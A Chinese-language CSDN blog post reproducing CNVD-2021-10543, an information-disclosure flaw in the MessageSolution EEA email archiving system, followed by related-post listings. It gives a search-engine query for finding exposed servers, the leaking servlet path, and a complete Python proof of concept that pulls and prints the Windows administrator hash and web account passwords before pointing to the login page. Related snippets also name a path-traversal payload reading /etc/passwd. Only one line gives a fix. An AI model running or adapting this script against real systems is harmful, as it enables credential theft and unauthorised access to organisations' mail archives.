CNVD-2021-10543 -- MessageSolution 邮件归档系统EEA 信息泄露漏洞

最新推荐文章于 2021-12-15 17:51:20 发布
最新推荐文章于 2021-12-15 17:51:20 发布
阅读量996 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DUANYU23/article/details/115333012
版权

MessageSolution 邮件归档系统EEA 信息泄露漏洞

0X001前言

MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。

0X002 漏洞影响

攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。

0X003 漏洞原理

通过访问敏感的文件获取到MessageSolution企业电子邮件的登陆信息,从而进行登陆

0X004 漏洞复现

0X041 空间搜索寻找目标

搜索语法: title="MessageSolution Enterprise Email Archiving (EEA)"

在这里插入图片描述

0X042获取敏感信息

在这里插入图片描述

访问地址: ip/authenticationserverservlet/

在这里插入图片描述
右键查看源代码,方便阅读

访问地址: view-source:https://ip/authenticationserverservlet/

在这里插入图片描述

在这里插入图片描述

登陆成功

在这里插入图片描述

0X005 POC

# CNVD-2021-10543
# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
# fofa: title="MessageSolution"

import requests
import time
import json
from bs4 import BeautifulSoup
# 忽略SSL证书校验提醒
requests.packages.urllib3.disable_warnings()

def title():
    print("+-------------------------------------------------+")
    print("+-----------    CNVD-2021-10543   ----------------+")
    print("+----------- MessageSolution信息泄漏 --------------+")
    print('+--------- Fofa: title="MessageSolution" ---------+')
    print("+--------  use: python3 CNVD-2021-10543.py -------+")
    print("+-------------------------------------------------+")

def target_url(url):
    target_url = url + "/authenticationserverservlet/"
    login_url = url + "/indexcommon.jsp"
    # verify = False 忽略SSL证书校验
    try:
        #发起get请求
        res = requests.get(url=target_url, verify=False,timeout=5)
        if "administrator" in res.text and res.status_code == 200:
            print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
            #系统休眠
            time.sleep(1)
            print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
            #解析页面
            bs_xml = BeautifulSoup(res.text,features="html.parser")
            #获取administratorusername,administratorpassword,username,password
            administratorusername = bs_xml.findAll('administratorusername')
            administratorpassword_hash = bs_xml.findAll('administratorpassword')
            user_names = bs_xml.findAll('username')
            passwords = bs_xml.findAll('password')
            i = 1
            print(f"[!] \033[31m获取到目标系统信息:\033[0m")
            print(f"\033[32m[0] 获取windows系统用户和hash\033[0m")
            print(f"用户名: {administratorusername[0].text}    hash: {administratorpassword_hash[0].text}")
            print(f"\033[32m[1] Web用户和密码\033[0m")
            if i < len(user_names):
                for user_name,password  in zip(user_names,passwords):
                    print(f"用户名: {user_name.text}    密  码: {password.text}")
                    i = i+1
            else:
                print(f"用户名: {user_names[0].text}    密  码: {passwords[0].text}")
            print(f"[!]\033[31m请访问: {login_url} 进行登录!")
        else:
            print(f"[0]\033[32m目标系统: {url} 不存在信息泄\033[0m")
    except Exception as e:
        print(f"[!]  目标系统: {url} 出现意外错误:\n {e}")




if __name__ == "__main__":
    title()
    url = str(input("[0] 请输入目标站点URL:\n"))
    target_url(url)

在这里插入图片描述

0X006 修复建议

可以使用非常规的目录名称,如果能删除也可以删除或者正确设置权限,禁止用户访问。

韭菜小白菜
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微E-message使用手册
03-17
泛微E-message使用手册,整个泛微e-message安装部署过程
E-message越权访问
自强不息
07-17 1092
只有劳动才可能使人在生活中强大。不论什么人,最终还是要崇尚那些能用双手创造生活的劳动者。
越权访问漏洞总结
热门推荐
黑面狐
07-28 1万+
一、平行越权 攻击者请求操作(增删改查)某条数据时,web应用程序没有判断该条数据的所属人,或者在判断数据所属人时直接从用户提交的表单参数中获取,例如用户id等,导致攻击者可以自行修改参数,操作获取不属于自己的数据。 测试方法:在发送请求时观察请求参数,尝试修改用户id或者其他参数验证是否能查看不属于自己的数据,进行增删改查,若成功则存在平行越权的漏洞。   二、纵向越权 和平行越权相似...
MessageSolution 邮件归档系统EEA 信息泄露(CNVD-2021-10543)
MD@@nr丫卡uer
03-30 631
0x01 前言 MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。 0x02 漏洞影响 攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。 0x03 fofa查询语句 title="MessageSolution Enterprise Email Archiving (EEA)" 0x04 漏洞复现 访问网站页面如图 payload http://ip/authe
Messenger致命漏洞!黑客可窃听通话
w3cschools的博客
11-22 455
Facebook在其广泛安装的Android Messenger应用程序中修复了一个漏洞,该漏洞可能使远程攻击者可以呼叫毫无戒心的目标,并在他们接听音频呼叫之前先听取它们的声音。 该漏洞是Google零项目漏洞调查团队的Natalie Silvanovich于10月6日发现并报告给Facebook的,截止日期为90天,并影响到Android Messenger的284.0.0.16.11919版本(以及更早版本)。 简而言之,该漏洞可能已授予登录到应用程序的攻击者同时发起呼叫并向目标用户发送特制消息
CNVD-2021-10543MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞.zip
最新发布
01-21
管理系统是一种通过计算机技术实现的用于组织、监控和控制各种活动的软件系统。这些系统通常被设计用来提高效率、减少错误、加强安全性,同时提供数据和信息支持。以下是一些常见类型的管理系统: 学校管理系统: ...
CNVD-2021-10543:CNVD-2021-10543MessageSolution企业邮件扩展管理系统EEA存在信息扩展漏洞
03-25
CNVD-2021-10543 CNVD-2021-10543MessageSolution企业邮件扩展管理系统EEA存在信息扩展漏洞#使用python3 CNVD-2021-10543.py
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
泛微e-message4.1私有云服务器安装配置手册
01-31
泛微e-message4.1私有云服务器安装配置手册,小白可以下载看看
泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断是否可以拿权限。oa_check.py http://ip:port whoami
MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543)
qq_42660246的博客
04-22 708
MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543) 1.漏洞描述 MessageSolution企业邮件归档管理系统 / MessageSolution Enterprise Email Archiving (EEA) EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。 该系统存在信息泄露漏洞泄露用户名和密码。 2.复现过程 fofa:title=“MessageSolution Enterprise Email Archiving (EEA)
MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞CNVD-2021-10543
千寻的博客
04-08 897
漏洞描述 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。 该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码 公开日期:2021-03-07 影响版本 MessageSolution Enterprise Email Archiving (EEA) 漏洞查找 title=“MessageSolution Enterprise Email Archiving (EEA)” 漏
CVE-2019-8660 iMessage 漏洞复现
十年磨一剑,霜刃未曾试!
08-22 2091
CVE-2019-8660 iMessage 漏洞复现 近期谷歌的研究人员披露了 5 个 iOS 中安全漏洞,并公布了 POC(Proof of concept),攻击者利用这些漏洞可以通过 iMessage 发送精心设计的消息来攻击 iOS 设备,这些漏洞不需要和任何用户交互,只要目标机 iMessage 信息接收成功即可触发漏洞。 CVE-2019-8660、 CVE-2019-8662、 C...
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现
thelostworld
03-28 509
MessageSolution 邮件归档系统EEA 信息泄露漏洞CNVD-2021-10543复现 一、简介 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码 二、影响产品 MessageSolution 企业邮件归档管理系统EEA 三、漏洞复现 访问页面: 存在漏洞poc路径: h...
2021年部分漏洞整合+检测工具
weixin_48421613的博客
12-15 3398
2021年已进入到尾声,出现的漏洞五花八门,令人眼花缭乱,其中确实有很多值得思考和学习,所以今天总结出9个比较有代表性、危害范围比较广泛的漏洞进行介绍,以及使用脚本进行检测 grafana任意文件读取漏洞 漏洞原理啥的就不再赘述,直接上测试过程以及脚本的检测方式,目前脚本检测仅支持单独检测 poc: /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd 页面原型: 漏洞
泛微ecology文件搜索_紧急漏洞小心被黑:泛微BSH组件漏洞攻击及解决方案
weixin_39627390的博客
12-04 2062
泛微BSH组件漏洞攻击攻击者IP: 47.244.17.210Uri: /weaver/bsh.servlet.BshServlet//weaver/bsh.servlet.BshServlet/Content_type: application/x-www-form-urlencoded请求主体: bsh.script=eval%00%28%22ex%22%2B%22ec%28%5C%22msh...
泛微 漏洞汇总
qq_39541626的博客
05-09 6868
SQL注入 前台SQL注入 用户名:admin’ or password like ‘c4ca4238a0b923820dcc509a6f75849b’ and ‘a’='a 密码: 1 验证页面参数 - loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&am
cnvd-2021-16886 利用脚本
07-07
### 回答1: cnvd-2021-16886是一个漏洞编号,代表某个具体的漏洞。利用脚本是指通过编写特定的代码脚本来利用该漏洞。 在利用cnvd-2021-16886漏洞时,可以通过编写脚本来自动化攻击过程,提高攻击效率和成功率。脚本可以使用各种编程语言编写,比如Python、Ruby、Perl等,根据具体需求来选择适合的编程语言。 脚本的编写可以包括以下步骤: 1. 了解漏洞:仔细研究cnvd-2021-16886漏洞的细节和原理,了解漏洞的利用方式和可能造成的影响。 2. 分析目标:确定攻击的目标,包括具体运行漏洞的应用、系统版本等信息。 3. 编写代码:根据漏洞的利用方式和目标的特点,编写相关代码段。这些代码段可能包含如发送特定的恶意请求以触发漏洞、获取目标系统的权限等功能。 4. 测试和优化:在合适的环境下测试编写的脚本,确保其能够成功利用cnvd-2021-16886漏洞。如果有问题或不完善的地方,需要进行调试和优化。 需要注意的是,利用漏洞是非法的行为,可能会导致法律问题和伦理问题。在进行漏洞利用时,应遵守法律法规并获得合法授权,比如在合法的渗透测试范围内进行。 ### 回答2: cnvd-2021-16886 是一个漏洞标识符,用于标识2021年的一个特定漏洞。根据我的了解,我将用300字的篇幅来回答利用这一漏洞的脚本。 cnvd-2021-16886 是一种远程代码执行漏洞,该漏洞存在于某个软件的特定版本中。通过利用这一漏洞,攻击者可以执行恶意代码,并可能获取对受影响系统的控制。 要利用这一漏洞,攻击者可以使用特定的脚本代码来构造定制的攻击载荷。这个脚本可能会利用漏洞中存在的软件错误,以执行恶意代码或利用系统的弱点。攻击者可以通过网络将这个攻击载荷发送到受影响的系统,从而实现攻击的目的。 脚本通常是用编程语言编写的一组指令,用于自动执行一系列任务。在利用 cnvd-2021-16886 漏洞时,攻击者可能会创建一个定制的脚本,以利用漏洞中存在的软件错误。这个脚本可能包含诸如代码注入、命令执行、文件包含等恶意操作,以便攻击者获取对系统的完全控制或进行其他恶意活动。 为了保护受影响的系统免受这一漏洞的攻击,管理员们应该立即采取行动。这包括及时升级软件以修复漏洞,或者使用补丁程序来修复软件中的错误。此外,还应增加系统的安全性,例如通过配置防火墙、加密通信和访问控制等手段来加强系统防御能力。 总之,通过利用脚本来利用 cnvd-2021-16886 漏洞,攻击者可以执行恶意代码并可能获取对受影响系统的控制。为了保护系统安全,及时修复漏洞并加强系统的安全配置是必要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值